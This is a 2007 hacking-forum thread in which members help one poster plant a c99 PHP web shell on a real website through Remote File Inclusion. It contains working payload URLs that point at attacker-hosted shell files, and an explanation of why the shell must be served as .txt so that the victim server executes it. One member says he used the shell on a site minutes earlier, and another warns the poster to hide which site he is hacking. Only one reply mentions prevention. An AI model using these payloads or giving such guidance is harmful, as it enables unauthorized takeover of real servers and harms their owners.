Donate to us via Paypal!
The measure of a mans life is not how well he dies, but how well he lives.
Friday, October 30, 2020
Navigation
Home
 Find:
 Information:
Learn
Communicate
Submit
Shop
Challenges
 Exploit:
 Programming:
 Think:
 Track:
 Patch:
 Other:
 Need Help?
Other
Members Online
Total Online: 125
Guests Online: 120
Members Online: 5

Registered Members: 129511
Newest Member: katty111
Latest Articles

View Thread

HellBound Hackers | Computer General | Web hacking

Author

c99 shell scripts


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 19-03-07 02:05
i found a website vulnerable to RFI and when i do index.php?page=http://www.arabian-outlaw.com/c99.txt
it doesnt work like a properly configured c99 shell
any help would be apprediated
Author

RE: c99 shell scripts


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 19-03-07 02:41
The only thing I can tell you is that with PHP you can easily prevent Remote File Inclusion just by modification few setting in the configuration.

Otherwise, what are you expecting from us as an answer ?
Author

RE: c99 shell scripts


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 19-03-07 21:44
turbocharged_06 wrote:
it doesnt work like a properly configured c99 shell


That is because it isn't a c99 shell for as far as I can see.
Try this one: http://b0rizq.by.ru/c99.txt?&

I just used it 5 minutes ago on a site so I'm sure it works.

Good luck!


Author

RE: c99 shell scripts


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 19-03-07 22:13
well try changing the extension to .php


Author

RE: c99 shell scripts


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 19-03-07 22:34
As already said. It is because the PHP code should not be parsed. Either turn off PHP for that file or name it .txt (or something else that doesn't get parsed by PHP).

The reason you need to this is because the PHP code is being parsed on your server before being shipped to the vulnerable server meaning you'll get a static shell instead of the actual PHP code.


Author

RE: c99 shell scripts


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 19-03-07 23:03
WhiteAcid wrote:
As already said. It is because the PHP code should not be parsed. Either turn off PHP for that file or name it .txt (or something else that doesn't get parsed by PHP).

The reason you need to this is because the PHP code is being parsed on your server before being shipped to the vulnerable server meaning you'll get a static shell instead of the actual PHP code.

can you explain that one more time
you mean i should put this
Code
http://b0rizq.by.ru/c99.txt?&



Into a file like
Code
http://www.arabian-outlaw.com/c99.php



because when i did that it opened the shell on my website
Author

RE: c99 shell scripts


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 20-03-07 19:40
Use http://b0rizq.by.ru/c99.txt in the attacks.

Here's a simpler explanation. Let's say you have a file called echo.php whose contents is:
Code
<?php echo "test"; ?>


. You want to run this on vuln.com using RFI.

You host this in attack.com/echo.php and call vuln.com/?cmd=http://attack.com/echo.php

vuln.com will send a request for that file, your site (attack.com) will get the request, parse it using PHP and send back the reply. vuln.com will get the reply, which will be test and include that, which is pointless.

If you renamed the file to .txt or .c or whatever and call vuln.com/?cmd=http://attack.com/echo.c then vuln.com will send the request to attack.com which will not parse the PHP file (as it isn't a .php file). This means vuln.com will get the reply <?php echo "test"; ?>, it will then execute that code (given the right type of flaw).

Does it make more sense now?


Author

RE: c99 shell scripts


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 20-03-07 20:21
The php code itself is useless. It's just plain text until the server has baked a working page out of it which is called parsing.

Basically what Acid is saying is that if the shell is named ".php"
http://b0rizq.by.ru will first parse the code and then send it to the vulnerable page. But that's not what you want! You want the vulnarble page to do the parsing, so you can access it's content. In order to accomplish this the shell needs to be a filesize which the php parser doesn't parse before the server sends it.
That's why the shell needs to be a txt file.

I hope this explanation + Acids great example are sufficient!

Good luck!

S-H


Author

RE: c99 shell scripts


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 20-03-07 23:34
WhiteAcid wrote:
Use http://b0rizq.by.ru/c99.txt in the attacks.

Here's a simpler explanation. Let's say you have a file called echo.php whose contents is:
Code
<?php echo "test"; ?>


. You want to run this on vuln.com using RFI.

You host this in attack.com/echo.php and call vuln.com/?cmd=http://attack.com/echo.php

vuln.com will send a request for that file, your site (attack.com) will get the request, parse it using PHP and send back the reply. vuln.com will get the reply, which will be test and include that, which is pointless.

If you renamed the file to .txt or .c or whatever and call vuln.com/?cmd=http://attack.com/echo.c then vuln.com will send the request to attack.com which will not parse the PHP file (as it isn't a .php file). This means vuln.com will get the reply <?php echo "test"; ?>, it will then execute that code (given the right type of flaw).

Does it make more sense now?

yes thank you i have previously tried that and it does process the statement
heres a picture of what i mean

ill update

Edited by on 21-03-07 00:07
Author

RE: c99 shell scripts


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 20-03-07 23:52
yo turbo take that pic down if you really dont want ppl to know the site your hacking cuz you can still tell by that pic.